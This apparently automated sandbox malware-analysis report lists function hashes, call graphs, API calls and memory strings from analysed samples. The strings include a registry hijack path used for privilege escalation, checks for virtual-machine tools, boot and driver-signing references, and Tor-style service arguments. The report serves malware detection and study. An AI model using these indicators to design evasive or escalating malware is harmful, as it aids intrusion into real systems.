                                                                                                                                                              • Instruction ID: 671b5b03821641faebe1e6f69aa4a5047bbd71b2e366a6b5f1ef13c977371326
                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                              • Instruction Fuzzy Hash: 24F096312007116FD7203BF5A88DB7E76F8EF4976DF100568E643E24C0DB74E8458A61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 13 2b6b485-2b6b4bf call 2b6b798 16 2b6b4c1-2b6b4f4 VirtualAlloc call 2b6b512 13->16 17 2b6b50d 13->17 19 2b6b4f9-2b6b50b 16->19 17->17 19->17
                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02B6B4D6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.4575660571.0000000002B6B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B6B000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_2b6b000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                              • Instruction ID: 3eafd3fda222438bd7c6a6074a71660ced02325cd344f86ea4a24d00a0618f13
                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                              • Instruction Fuzzy Hash: CC113F79A00208EFDB01DF98C995E99BBF5EF08350F058094F948AB361D375EA50DF80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Strings
                                                                                                                                                              • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:, xrefs: 00433A71
                                                                                                                                                              • VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu, xrefs: 00433AA5
                                                                                                                                                              • ,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos, xrefs: 00433A05
                                                                                                                                                              • runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not, xrefs: 00433B27
                                                                                                                                                              • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                                                                                              • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
                                                                                                                                                              • %, xrefs: 00433B64
                                                                                                                                                              • CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return, xrefs: 00433B00
                                                                                                                                                              • runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state , xrefs: 00433ACC
                                                                                                                                                              • runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st, xrefs: 00433B5B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000840000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000C77000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000C7A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000CCF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000CD3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000CEF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000CF6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: %$,/=MOScghs ( + , / @ P [ %q%v(") )()*., ->-r-t.\///C/d/f/i/q/s/v000X0b0o0s0x25536480: :]; =#> ??A3A4AVB:CNCcCfCoCsLlLmLoLtLuMcMeMnNdNlNoOKOUPCPcPdPePfPiPoPsSBSTScSkSmSoTeToV1V2V3V5V6V7YiZlZpZs")":"\*\D\E\S\W\"\\\d\n\r\s\w ])]:][]dsh2i)idipivmsn=nsos$CreateWaitableTimerEx when creating timer failedHKCU\Software\Classes\mscfile\shell\open\commandMozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)SELECT OSArchitecture FROM Win32_OperatingSystem"%s" --nt-service -f "%s" --Log "notice file %s"bufio: writer return$VirtualQuery for stack base failedadding nil Certificate to CertPoolarchive/tar: header field too longchacha20: wrong HChaCha20 key sizecouldn't create a new cipher blockcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid bu$bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t$runtime.minit: duplicatehandle failed; errno=runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not$runtime.minit: duplicatehandle failedruntime: allocation size out of rangeruntime: unexpected SPWRITE function setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextptimezone hour outside of range [0,23]tls: failed to verify certificate: %st$runtime: CreateWaitableTimerEx failed; errno=runtime: failed mSpanList.remove span.npages=tls: internal error: failed to update binderstls: internal error: unexpected renegotiationtransform: input and output are not identicaltransitioning GC to the same state $runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: marked free object in span runtime: mcall called on m->g0 stackruntime:$runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g
                                                                                                                                                              • API String ID: 0-2845907608
                                                                                                                                                              • Opcode ID: 4ee474e8321923de33487fdd75fee96f24fc28db05651af307a526fdfd105d7c
                                                                                                                                                              • Instruction ID: 54d86a38c7ca5e9b4d361dfb47ed8c6cf3eb888c171a558932b5f88d5bc68312
                                                                                                                                                              • Opcode Fuzzy Hash: 4ee474e8321923de33487fdd75fee96f24fc28db05651af307a526fdfd105d7c
                                                                                                                                                              • Instruction Fuzzy Hash: 8281CFB45097018FD700EF66C18575AFBE0BF88708F41992EF49887392EB789949CF5A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Strings
                                                                                                                                                              • releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog, xrefs: 00443929
                                                                                                                                                              • m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr, xrefs: 0044394B
                                                                                                                                                              • p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req, xrefs: 00443997
                                                                                                                                                              • releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip, xrefs: 004439E1
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000005.00000002.4559431109.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000840000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000C77000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000C7A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000CCF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000CD3000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000CEF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 00000005.00000002.4559431109.0000000000CF6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_5_2_400000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...), i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerAr$ p->status= s.nelems= schedtick= span.list= timerslen=$WINDIR\rss%!(BADPREC)%s (%d): %s) at entry+, elemsize=, npages = , settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=BLAKE2b-256BLAKE2b-384BLAKE2b-512BLAKE2s-256Bad GatewayBad Req$releasep: invalid argremoving command appsruntime: confused by runtime: newstack at runtime: newstack sp=runtime: searchIdx = runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestun.sip$releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                                                                                                                                                              • API String ID: 0-3530339137
                                                                                                                                                              • Opcode ID: 6ddd3ac5b059c9ab672e6389908ded336cb29292fcf9e4790accb9b3f73c87e1
                                                                                                                                                              • Instruction ID: 41eda2ad12dc9040aabd0b4fda58d31df6fc94468559f7c6cc3daccb715ab915
                                                                                                                                                              • Opcode Fuzzy Hash: 6ddd3ac5b059c9ab672e6389908ded336cb29292fcf9e4790accb9b3f73c87e1
                                                                                                                                                              • Instruction Fuzzy Hash: 9C31E2B45087418FD700EF25C185B1AFBE1BF88708F45882EF4888B352DB789948CB6A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2434020633.00007FF7DB321000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7DB320000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2433970017.00007FF7DB320000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2434108564.00007FF7DB340000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2434137996.00007FF7DB341000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2434877778.00007FF7DB8AF000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2434918009.00007FF7DB8B1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2434947381.00007FF7DB8BC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2434975397.00007FF7DB8BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000006.00000002.2435004992.00007FF7DB8C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_6_2_7ff7db320000_latestX.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: e79f93c7cd3705f9aaf9e11784eb747df23ff89f702dc453d33123077158a3e8
                                                                                                                                                              • Instruction ID: 276dc42202ef24943767a0b066bd8a720a8d6254cc8493be31b64c17c1015ffb
                                                                                                                                                              • Opcode Fuzzy Hash: e79f93c7cd3705f9aaf9e11784eb747df23ff89f702dc453d33123077158a3e8
                                                                                                                                                              • Instruction Fuzzy Hash: 54B01230D0460994F3003F19F84225C7760AB09B41FC14036C50C03372CFBC60504B70
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:6.1%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:19
                                                                                                                                                              Total number of Limit Nodes:0
                                                                                                                                                              execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                                                                                                                                                              Callgraph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                              • Disassembly available
                                                                                                                                                              callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                                                                                              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000009.00000002.2281072970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_9_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessSleepTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 417527130-0
                                                                                                                                                              • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                                                                                              • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                                                                                                                                                              • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                                                                                                                                                              • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                                                                                              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000009.00000002.2281072970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_9_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessSleepTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 417527130-0
                                                                                                                                                              • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                                                                                              • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                                                                                                                                                              • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                                                                                                                                                              • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                                                                                              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000009.00000002.2281072970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_9_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessSleepTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 417527130-0
                                                                                                                                                              • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                                                                                              • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                                                                                                                                                              • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                                                                                                                                                              • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                                                                                              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000009.00000002.2281072970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_9_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessSleepTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 417527130-0
                                                                                                                                                              • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                                                                                              • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                                                                                                                                                              • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                                                                                                                                                              • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • Sleep.KERNELBASE(00001388), ref: 00401846
                                                                                                                                                              • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000009.00000002.2281072970.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_9_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ProcessSleepTerminate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 417527130-0
                                                                                                                                                              • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                                                                                              • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                                                                                                                                                              • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                                                                                                                                                              • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:4.4%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:12
                                                                                                                                                              Total number of Limit Nodes:1
                                                                                                                                                              execution_graph 840 2b16026 841 2b16035 840->841 844 2b167c6 841->844 845 2b167e1 844->845 846 2b167ea CreateToolhelp32Snapshot 845->846 847 2b16806 Module32First 845->847 846->845 846->847 848 2b16815 847->848 850 2b1603e 847->850 851 2b16485 848->851 852 2b164b0 851->852 853 2b164c1 VirtualAlloc 852->853 854 2b164f9 852->854 853->854 854->854

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02B167EE
                                                                                                                                                              • Module32First.KERNEL32(00000000,00000224), ref: 02B1680E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000011.00000002.4575377290.0000000002B16000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B16000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_17_2_2b16000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3833638111-0
                                                                                                                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                              • Instruction ID: 94910a77e8a4d3f1cf712b5a4e6a61d29529de2b58fdfc8cdae07437283950ac
                                                                                                                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                              • Instruction Fuzzy Hash: F5F096316007106FD7203FF5A88DB6E77ECEF49629F600569E642910C0DB70E8454A61
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 13 2b16485-2b164bf call 2b16798 16 2b164c1-2b164f4 VirtualAlloc call 2b16512 13->16 17 2b1650d 13->17 19 2b164f9-2b1650b 16->19 17->17 19->17
                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02B164D6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000011.00000002.4575377290.0000000002B16000.00000040.00000020.00020000.00000000.sdmp, Offset: 02B16000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_17_2_2b16000_e0cbefcb1af40c7d4aff4aca26621a98.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                              • Instruction ID: 47f0dc1a3fa1ea33b61dbe6fbbf41f8dde0d291df37e39b4cc66770c286a911c
                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                              • Instruction Fuzzy Hash: F0113C79A00208EFDB01DF98C985E99BBF5EF08350F458094FA489B362D371EA90DF80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              Strings
                                                                                                                                                              • runtime: g0 stack [runtime: pcdata is runtime: preempt g0semaRoot rotateLeftset HTTPS proxy: %wsignature not foundskip this directorystopm holding lockssync.Cond is copiedsysMemStat overflowtoo many open filesunexpected InstFailunexpected data: %vunexpected g , xrefs: 004339DB
                                                                                                                                                              • bad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegcentersyscallexit status failed t, xrefs: 00433A4A
